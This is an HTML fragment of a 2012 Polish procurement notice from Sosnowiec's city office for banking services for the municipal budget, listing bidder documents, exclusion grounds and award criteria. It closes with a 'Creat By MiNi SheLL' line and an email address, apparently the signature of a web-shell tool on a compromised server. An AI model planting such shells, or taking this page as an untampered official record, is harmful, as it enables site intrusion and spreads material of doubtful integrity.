<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający wymaga, aby każdy z wykonawców złożył indywidualne oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, z przyczyn opisanych w art. 24 ust. 1 ustawy, stosowne do sytuacji faktycznej wykonawcy i formy prawnej prowadzonej działalności oraz dokumenty wymienione w punkcie III.4.2) tired 2-6 niniejszego Ogłoszenia.<br>
2. W przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, jeżeli osoby, o których mowa w art. 24 ust. 1 pkt 5) - 8) ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do tych osób zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust.1 pkt 5) - 8) ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert z tym, że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób.<br>
2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie III.4.3.1) niniejszego Ogłoszenia zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.<br>
3. Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego - jeżeli osoba reprezentująca wykonawcę nie jest wskazana jako upoważniona do jego reprezentowania we właściwym dokumencie (np.: KRS lub inny wynikający z przepisów szczególnych). Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br>
4. Forma oświadczeń i dokumentów:<br>
4.1. Oświadczenia:<br>
- o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC,<br>
- o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC, z przyczyn opisanych w art. 24 ust. 1 ustawy, stosowne do sytuacji faktycznej wykonawcy i formy prawnej prowadzonej działalności<br> 
- należy złożyć w formie oryginału.<br>
4.2. Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie z art. 26 ust. 2b ustawy), jeżeli wykonawca będzie przy wykonywaniu zamówienia polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - należy złożyć w formie oryginału;<br>
4.3. Dokumenty, informacje i wykazy na potwierdzenie spełniania przez wykonawcę warunków udziału w postępowaniu o udzielenie zamówienia na: BANKOWĄ OBSŁUGĘ BUDŻETU GMINY SOSNOWIEC oraz dokumenty na potwierdzenie braku podstaw do wykluczenia należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.<br>
4.4. Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski.<br>
4.5. Dokument pełnomocnictwa należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza.<br></p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - marża dla kredytu - 4</li>
<li>3 - liczba stanowisk kasowych w placówkach wykonawcy - 1</li>
<li>4 - wysokość oprocentowania rachunków niepodlegających konsolidacji - 2</li>
<li>5 - wysokość oprocentowania lokat na rachunku skonsolidowanym - 4</li>
<li>6 - wysokośc oprocentowania lokat terminowych - 4</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, al. Zwycięstwa 20, 41-200 Sosnowiec, pokój 203 B..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 10:00, miejsce: Urząd Miejski, al. Zwycięstwa 20, 41-200 Sosnowiec, pokój 203 B, I PIĘTRO..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com